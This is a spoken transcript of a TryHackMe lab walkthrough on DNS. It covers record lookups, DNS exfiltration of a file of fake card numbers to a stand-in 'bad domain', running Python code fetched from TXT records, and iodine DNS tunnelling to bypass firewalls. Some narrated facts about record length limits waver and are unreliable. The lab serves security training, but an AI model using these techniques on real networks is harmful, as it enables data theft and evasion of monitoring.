Hello and welcome to the DNS Manipulation Lab on TryHackMe. I'm going to be giving a general walkthrough, nothing too complicated. Basically just doing this for some classmates and anyone that needs a English-speaking walkthrough. So let's get started. In this room we'll be looking into DNS and showcasing the techniques used to exfiltrate and infiltrate data. First, we will look at what purpose DNS serves, how it works, and the types of DNS records. In this image here, it shows how you, as a client, will send off a DNS request for google.com to a DNS server. It will then spit back an IP address, which that's what your network card and your operating system will understand and will connect to. We will then move to show how DNS is being used as data exfiltration and data infiltration tool via DNS queries. And finally, we'll look at DNS tunneling and how it is used to tunnel different protocols like HTTP through DNS. So let's get started. So for this installation section here, you want to go ahead and make a folder. So as you can see, I've made one called DNS Manipulation Lab. And you want to use this, open the terminal in that folder and use this command. That should download another folder that has inside of it, I think, 4 other scripts. There might be more, might be less, depending on when it was done. You will also need to make sure that you have the required Python 3 modules. This is very important because if you do not have them, this lab will not work for you. So separately, make sure you run this command, the sudo pip3 install r requirements.txt, and you get the requirements.txt from this folder. So whatever the folder is that you made, /DNS exfil and infil. We will use Iodine for DNS tunneling. That's just a simple install that should already be on your Kali system. However, if it is not, go ahead and install that. And obviously we will need Wireshark. Kali generally comes with this pre-installed. Although, if you've corrupted your Kali or something has gone wrong, or you're doing this on a Debian machine, please use that install link there, sudo apt install -y tshark. Alright. So here we would want to set up a DNS server. In this video, I'm not really going to get into that as it's not entirely needed to really understand what's going on here. This is kind of more of a out of scope kind of thing. However, obviously you've got a link here in which you can actually go ahead and set up your own DNS server. But as I've completed this lab before and I've already been through that, I'm not going to bother with it. So what is DNS? At a high level, a domain name system refers to a naming system that resolves domain names to IP addresses. DNS servers are distributed all across the world, and they are constantly being updated and synced amongst each other in a systematic way. When a user makes a request using a domain name, such as tryhackme.com, the DNS will translate tryhackme.com into its IP address, which then obviously your machine will understand. It's also worth noting that in some scenarios that the IP address returned by the DNS won't always be the origin server's IP address if DNS records are being proxied, such as Cloudflare, which obviously stops DDoS attacks, and other kinds of attacks, but mainly DDoS protection is what Cloudflare is used for. Technically, every device connected to the internet has an IP address, which acts as an identity when communicating with other internet devices and machines. Therefore, it is essential to understand the DNS's primary function and the hierarchy that the translation traverses. DNS root name servers sit at the top or root of the DNS hierarchy and play a critical role for the internet. Information for all top-level domains such as .com, .uk, .net, and their associated domain name servers are housed in the hundreds of root servers that are across the world. As you can see here, you've got root. Oh, hello root. This is a .com. This is google.com. Well, actually, I'm looking for maps.google.com, and we'll explain this further on. So you have several links here. Feel free to read through them. If you don't really understand DNS at all, it's kind of beginner level stuff. However, it's obviously important to keep your tools up to date and keep your mind sharp. So go ahead and click those links if you want to pause now and go through that. There are more DNS record types, however they won't be necessary to know for this walkthrough. They get a bit complicated. There are obviously very useful ones for hackers, and then there are less useful ones like, mail server, things like that, which you could probably figure out anyway. If you'd like to learn more though, please refer to this Cloudflare link. Cloudflare, as you know, is a DDoS protection, started as a DDoS protection company, but now they seem to be into teaching. So, click that if you need to know. So we're going to go through a few things here. The questions, they kind of assume that you're going to read all of this, right? But we're not. We're not going to. We're just going to open command prompt here, and we're going to try a thing called NSLOOKUP. That means name server lookup. So NSLOOKUP. We would want the text record, so we're going to go -type equals text, and then our target, so that's youtube.com. So we get the non-authoritative answer, which we will go further into later on. However, we do get these 3 text records, right? We can try another website like Google, and you're going to get a lot of text records. These can be used, they're generally used for administrators and network professionals that will maybe put notes in there. They might put, backup website links in there, things like that. Sometimes, if they're too kind of sure of themselves, you might be able to find something interesting, which we'll find out later on. So we've got that. That's the first question. So we want to NSLOOKUP text youtube.com, right? Close that terminal. Let's see if this is correct. Alright, good. That's nice. Now, for Linux. Linux systems have, in my opinion, a better tool. It's called dig. So we want to use the dig tool to search facebook.com's text records. Alright, so the syntax is a little bit different. We want dig facebook.com, and then we're looking for text records. So it's usually dig, target, type. Right, just remember that for later on. Alright. I might make this a little bit bigger. Oh, that didn't help much, but alright. So you've got here, got another text record. There's in between the quotes, as you can see. We've got 4 text records for facebook.com. Now, a company like Facebook or Google or YouTube, they're not going to leave anything critically important in these text records. However, most of your targets aren't going to be a company like Facebook or YouTube. So just do your due diligence. Sorry for that. And make sure that you actually check if you're going to be performing reconnaissance or pen testing, things like that, because you never know when some IT dude has put in a backup admin website, admin.google.com, right? So here, the answer here for this is dig facebook.com text. Alright, that's good. Now, the third question. Quad A stores what kind of IP address along with the hostname? Well, Quad A, if you have done the previous reading and previous intro to DNS, you should know that that is IPv6. Alright. The maximum characters for a DNS text record is 256. Okay, trick question. Text record. There is no real limit to a text record. Right? So the answer is nay. What DNS record provides a domain name in reverse lookup? Alright, so I would like you to take a minute and research this. I'm going to leave this until the last so that you've got some time and you don't try and skip ahead. What would the reverse lookup be for the following IP address? You must research this. But, now that we've got two questions that we have to research, we may as well try it. Right, so we want to do a PTR. Okay. Pointer record. Pointer, right? PTR, pointer. Provides the domain name associated with an IP address. The pointer record is exactly the opposite of an A record, which provides the IP address associated with domain name. So, to give you an example, if I typed in 8.8.8.8, okay, the PTR would be google.com. Right? It's not the other way around. So instead of checking google.com and then getting back 8.8.8.8, we are going to type in 8.8.8.8 and the PTR will give us back the name. So google.com. So the answer there is, PTR. What would the reverse lookup be for the following IP address? Alright. You can do a reverse lookup. I mean, you can just use a website, it doesn't really matter. Generally, you can just do it in command line, but, the chances of you having a Kali machine next to you while you do just initial recon's probably not going to be very high. But let's go to Kali, right? We do DNS recon. Okay. And what's this IP address? Interesting. It doesn't seem to be a reverse lookup option. Never mind that. Yeah, see, I thought DNS Recon would work. But, obviously not. Right, well, we're going to go on a little side trail here, and we're going to find a DNS Recon command that will give us a reverse lookup. Obviously, it's been a little while since I've used this, so let's see. Alright, so DNS recon D 8.8.8.8 S. Huh. How about we try the IP address that was given to us? It doesn't work. Interesting. RDNS. So, we don't need to use DNS recon at this very moment in time, apparently. So we can actually use the X flag with dig. So it seems dig X, right, 8.8.8.8. There we go. So, we'll get the PTR, as you can see, it gives the PTR record. Now, I know this hasn't been the quickest explanation, but, you know, we're both learning here, so, you know, it is what it is. As you can see, after putting in dig -x and then 8.8.8.8, it takes us to dns.google. Okay. However, that's not the target. Target is this IP address, which is giving the response 2.203.168.192 in adder ARPA. Okay, so we want to copy that and paste. Alright, so there you go. The -x for dig is a reverse lookup. Alright, on to task 5. DNS exfiltration is a cyber attack on servers via the DNS, which can be performed manually or automatically with certain tools, depending on the attacker's physical location and proximity to the target devices. In a manual scenario, attackers often gain unauthorized physical access to the targeted device to extract data from the environment. Whereas in automated DNS exfiltration, attackers will use malware to conduct the data exfiltration while inside the compromised network and machine, of course. DNS is a service that will usually be available on a target machine and allowing outbound traffic, typically over TCP or UDP, over port 53. This makes DNS a prime candidate for hackers to use to exfiltrate data. Data exfiltration through DNS could allow an attacker to transfer a large volume of data from the target environment. DNS exfiltration is mostly used as a pathway to gather personal information such as social security numbers, intellectual property, or other personally identifiable information. DNS exfiltration is mostly used by adding strings containing the desired loot to the UDP requests. The string containing the loot would then be sent to a rogue DNS server that is logging these requests. To the untrained eye, this could look like a normal DNS traffic. However, next-gen firewalls have decent security against this kind of thing. However, you know, attackers are getting more complex and more malicious, and you can never be too sure. So what's the maximum length of a DNS name? Okay. I believe it is 256. No, it is not. 254. No. Alright, so we're going to research. Again, It's been a while since I've done this, so bang. Oh my god. It's 255. Very strange. So it's not 254, 255, or 256. So that is very interesting. Especially seeing as I thought it was one of those three. That's for sure. So I must be wrong. And we are going to figure out what part of this that I'm wrong at. That's 255. I mean, I've already tried 255. I'm not sure why this is not working. Seems to be a bit of bullshittery happening here. Again, we will try 254 like we tried before. Incorrect. No. 253. Well, isn't that interesting? See, they don't make this easy. The readable maximum number of length is 253. You don't encode the dots. However, here it says you do. So, that's an error on TryHackMe, and I will make a ticket later for that. That should be deleted. This is the correct answer. 253 is the maximum length of a DNS name. Let's continue. In this example scenario, an attacker is trying to exfiltrate data to their system and decided their best option is going to be using DNS queries. The attacker's goal is to exfiltrate sensitive information from a machine on SecureCorp's network. In this demo, I'll be showing the steps that an attacker might take in order to exfiltrate the data from the compromised machine. Right, so you have SecureCorp's machine. Wants to go out. Right, we want data out of SecureCorp. So, we're going to be attacking. We are going to go to the DNS server. Okay, we are probably going to capture all the queries coming into that DNS server, right? So obviously you can see here you've got T-Shark capture on. Okay, so we are capturing everything coming into this, and we are exfiltrating from in here, possibly using some malware, bits and information through the DNS header, right? So we already have these files here. They should be in your DNS exfil infill. So we've got packetygrabber.python, yep, packety.python, packetysimple.python, readme, markdown document, requirements.txt, which we used before to install the right Python libraries, and securecorp.txt. Right, so we have the secure corp text file. I want to have a look at that right now. Cat. Right. As you can see, it gives us some fake credit card numbers, right? And these are fake, so don't bother going using them. So we are going to use the packety Python file to have a look at this secure corp text file, right? So Python 3. No, we do not want that. Packety.py. File name. We want to do secure corp.txt. Bad domain. So this is now forwarding the information from that file through DNS Alright, it's done. So that information, that file has now been exfiltrated. Okay? That's how it works. And obviously, you know, you'd find a better tool than this. Something that could obfuscate the data better. But, as you can see, it's been transmitted, that is done. So, that program, it starts by reading from the text file. The text file's content will be base 64 encoded and then base 58 encoded. This leaves us with a long string. The string is then split into 20 character long sections, where each section will have 3 dummy characters added to it, so that it doesn't look too sus, which it will. Obviously you need to go a bit further than this to actually get things out, but it's a good idea of understanding how this works. 1 character will be prepended to the encoded string, and 2 characters will be appended. Okay, for example, a section of the encoded data might look like this, and then after the extra things, we would have 1 prepended, 2 put on the end, right? Appended. Pre-app, right? Good. Once everything is encoded and ready, the code will wait for the user to press enter in order to start transmitting the queries to the DNS server. The DNS server would have already been set up to capture the incoming requests with Wireshark or T-Shark. Right, but because we did not set up our own DNS server, we will use here this lab to see what it should look like. So then you just wait for the transmission to reach 100%. If any of the queries are not delivered on time and in the right order, it will be useless, right? Because you know, if you have 50% of a file, we don't know what 50% of that is missing, and most likely it'll just be a corrupted file. Now you can use tools that will rebuild that, but the idea is to keep everything intact. Right. So, say I ran a server, I'd be capturing packets, right? Capture credit cards, .pcap, and then suddenly, look, here we go, we've got 369 normally, and then suddenly a big burst, 1,157. So that's happened, right? The Python script has transmitted the file, and then you have much more DNS queries, right? So, packety grabber, okay? Packety grabber will now be used on that main machine, the Ubuntu machine, and of obviously you'd be able to decode those. Yeah, so it's just a reverse tool. So you packety, sending it through, packety grabber, that's grabbing it, decoding it, and outputting it. Yep, and as you can see, if everything goes well, it should look like this. Alright, you should actually get the entire file sent through in the same format, the same everything. Right. Alright. Now we're going to deploy a virtual machine inside TryHackMe. And for this, we are going to be switching over to the TryHackMe network through the VPN. If you don't have the TryHackMe VPN set up yet, I would highly suggest that you do so. Without it, you're gonna have a hard life. It's gonna be pretty rough on you to complete these labs and be able to do anything really. So we have here the SSH credentials. So we go touch, or actually sub DNS machine SSH. We want to do copy that in. Alright, so our machine is started up. So they want us to look in the challenges exfiltration folder. That will be on the machine. So let's SSH user at 10.10.19.193. Yes. Password is p at word01 ls cd challenges ls cat. No, actually, it's a directory. So we want exfiltration for this. So cd exfiltration ls. So we want order list and identify. And we'll open a separate terminal. So we've got SSH on the right, on the left, sorry, and then we want a main terminal on the right for our machine. Okay. So for this task, we'll complete the challenges found in challenges exfiltration folder. The tools required in order to complete the task can be found in the DNS exfil folder on Alright, so we want to identify the domain name used to exfiltrate data using the following command to see all DNS queries: tshark r autopcap capital T fields e dns.query.name. Okay, so tshark r auto.pcap T fields e DNS.query.name. Alright. And what do you think stands out here? Alright. Something stands out. Can you see it? Right, these are being exfiltrated out. Okay. So if we go back to the question, right? The domain name used to exfiltrate the data, that's going to be badbaddomain or badbaddoma.in, right? So we've done that. That's the first task. It's completed. Use a packety grabber located in this. So we'll run this script using Python 3. If we could only just copy it. Scroll all the way down to the bottom and paste. Order.pcap. Now, that is correct. Alright. File name output. What are we going to call it, right? Decoded order. .text. Badbadoma.in. ls cat decoded order.text. Okay. So as you can see, we've decoded the information that was captured from the DNS, basically a virtualized Wireshark. And in that PCAP folder, it obviously had what seemed to be mumbo jumbo, right? All of this, okay? Every single bit of it. But all of that was actually this. Alright. So, order ID 1, the first question on this lab here. Order ID 1. What is the transaction name of order ID 1? That would be network equipment, right? Correct. And how much did the firewall cost? Without the dollar sign, of course. Well, that'll be 2,500. Alright, so now we're going to go to the identify DNS lab. So, CD, go back, ls, cd identify, ls, cat task. Alright, so identify which file contains suspicious DNS queries. Okay, ls, la. So you got PCAP 1, PCAP 2, and PCAP 3. And they have different file sizes, right? But that might mean nothing. You know, you never know. Especially if it's encoded. So we are going to decode each one of them. Okay? So Python 3 and then we'll copy that and paste. Okay. Cap 2. So we're doing this for each capture here, right? File name it cap2.txt. Bad drama in. cap3.pcap. cap3.txt. Bad drama.in. LA. So, after decoding them, we can see that cap1 pcap turned out to be nothing. Right? cap2 pcap also turned out to be nothing. However, cap3 pcap, after decoding, has 28 file size of 28 kbs, I think it is. Well, either way, we're going to cap3.txt. And there we have it. We have administrator and secret password. Right? So, over here, we're going to go to the challenges for identify. Which file contains the suspicious DNS queries? And that was cap3.pcap. Right? Enter the plain text that you got after decoding the data using packety grabber found in DNS exfil infill folder. Well, we have here administrator secret password. Correct. Great. Alright, DNS infiltration. DNS infiltration is another method used by attackers to exploit the various vulnerabilities within an organization's DNS server. Unlike exfiltration attacks, infiltration defines the process where malicious code is run to manipulate DNS servers, either using automated systems where attackers connect remotely to the network, or manually, where they plug in. DNS infiltration is primarily used for file dropping, for example, dumping some virus onto a certain computer, or to all the computers, depending on the level of sophistication. As you can see here, that can be caught with behavioral signature-based or reputation-based threat detection systems. However, there are ways to be very sneaky and get past that. If this method of transporting data goes unnoticed, it could lead to malicious activities such as code execution. This has caused havoc and disrupted various well-known companies. In summary, the DNS protocol can be used as a covert protocol that can aid in malware staging, execution efforts, and also exfiltration. It can ping back to a CNC server and help you guide what the malware does next, or unleash its payload, and etc. What kind of DNS record is usually used to infiltrate data into a network? Well, I'm going to take a wild guess here and say it would be the text, as you can put malicious code inside of the text file. And then you would use the computer or a vulnerable host to copy that, decode it, and run it. For example, you could put a Python script in there and run that through Python. So, DNS infiltration demonstration. Alright, in this scenario, the attacker is going to infiltrate a piece of malicious code into the victim's computer. There are many different techniques that attackers in the real world use to achieve this. To simplify things, I'll be using a TXT record that is set up on my public DNS server. The value contained in this record is malicious code. Since text records are limited to 255 characters, the hackers will most likely have Yeah, so sorry, before I thought it was unlimited. However, it is 255 characters, so that's where I had the mix-up. Anyway, moving forward. So it's limited to 255 characters, and the hackers will most likely have multiple text records, allowing, obviously more than, you could get thousands of characters worth of code in if you just make, 6 or 7 of these text records. It ultimately depends on how long their code is. Now that everything is set up and ready, all the hacker needs to do is request those text records, capture the value, decode them, and boom. Now they've infiltrated their own code into a compromised system, right? So, attacker, SSH server into the DNS, put into the text record some evil code, right? Secure Corp's network goes into the text record, copies it, malware.py, which would be malware that would do the decoding and everything automatically. It would run, say a few days after, right, ensuring that the payload has been received. It would run, decode this code, and say they're looking for a certain thing. Maybe they've targeted the first 3 text records to be decoded in the malware to, it's like an instruction, right? You're telling it, okay, grab Lockheed Martin's this, grab Google's that, right? And you would do that through this if it's not already. The TryHackMe is a little bit bugged. There are 2 errors here. Basically, in the command, it tells you to do rt1 bad domain. It's actually code.bad domain. And the grep for ZA will not work either. You actually have to grep ye, right? So, ns, I'll just copy this, right? And we'll change it. So that's code bad domain. And grepping ye. Alright. Success. Finally, after troubleshooting 3 different errors with the TryHackMe thing, we finally have our malware. Alright, so why don't we have a look at that? Okay, so we want to use packety simple. So I'm pretty sure that's in the DNS exfil infill. Python 3. Packety simple.py. File name. Interesting. Well, what we can do here is cd back. Okay, we want to Python 3 DNS exfil infill packety simple.py. There we go. little cat. Have a look at it. So, import OS, print OS username. Okay, so that's going to be the malicious code that was stored all the way in code.baddomains text. Just remember when you're doing this, the grep on the website on the TryHackMe lab is wrong. You have to grep for ye, and also the domain is wrong. It's actually code.baddomain. Okay, so just make sure you're covering your bases there. So that is completed. So we have infiltrated. Let's go up to the top. Oh, well, let's just clear this. It's messy. All right. And we want to ls cd challenges ls cd infiltration ls cat task. Okay, so we've got one of the final tasks here. We've already done the packet is simple to decode the Python, which is what usually would happen. The malware would do that itself. We wouldn't be manually doing this. And now we want to actually run the program. So cd dot dot cd dot dot. All right. Oh, it's not here. ls.a. There we go. So we want a python 3.mal.py. And there we have our answer. Right, so this isn't so much part of the lab, but it is a DNS tunneling example. Okay. The previous two tasks, we saw how DNS requests and responses could be used to infiltrate and execute payloads. Companies will typically have firewalls, IDSs, IPSs in place to prevent or alert when inbound and outbound protocols pass through the network. The one protocol that is rarely monitored by companies is DNS. Because of this, hackers are able to bypass a lot of the unwanted protocols by using DNS tunneling. For this demo, we will explore how a hacker could bypass various restricted websites by using HTTP over DNS. To achieve this, I'll be using Iodine. You can learn more about it in the link. So he's got a AWS hosted Linux machine that will be the DNS tunnel server. So Ubuntu virtual machine running on his local computer, that will be the DNS tunnel client. And he has the badtunnel.in, right? So the DNS configuration looks like this. This is his Google domain. Right. Certainly set it to 1 hour. So this is a tunnel, and this is the DNS of the tunnel, right? tunnel.badtunnel.in. To get started, both machines need to have Iodine installed. If you're on a Debian-based distribution such as Kali, it will be in the apt repositories, like before. Iodine is a client. Iodined is a server, which stands for Iodine daemon, right? On the server, you'll start the Iodine daemon with the following arguments: sudo iodine b 27001 f 10.0.0.1 tunnel.badtunnel.in. Now on your client machine, we would run iodine with these arguments: sudo iodine 3.17.153.29 tunnel.baddomain.in. If everything is set up correctly, we should now have connection to our DNS tunnel server. We can try and ping 10.0.0.1 the server to see if it's connected. If you can ping it, it's working. Now, the HTTP over DNS is not fully set up yet. First, we need to generate an SSH key and upload the content of ID RSA pub to our DNS tunnel server in the authorized keys file. Here are the steps: SSH keygen TRSA. You obviously make sure that it's there by catting it. You also checked for the authorized keys. Then you SSH into Ubuntu, and it will show IP address for DNS 01 or O will be 10.0.0.1. Now we need to open our browser, Firefox in case, and change the proxy settings. There are also browser extensions such as Foxy Proxy that can do this. For the proxy options, we'll configure it to manual proxy configuration on port 8080 using the localhost. And then you'll obviously go to IP Chicken or My IP and check your IP, and it should be the IP address of your server, and you shall now be able to surf freely without any ISPs or anything searching for what you're doing. Alright, so iodine. Alright, that's it. I hope this was thorough enough, and I hope you enjoyed my walkthrough. Thank you.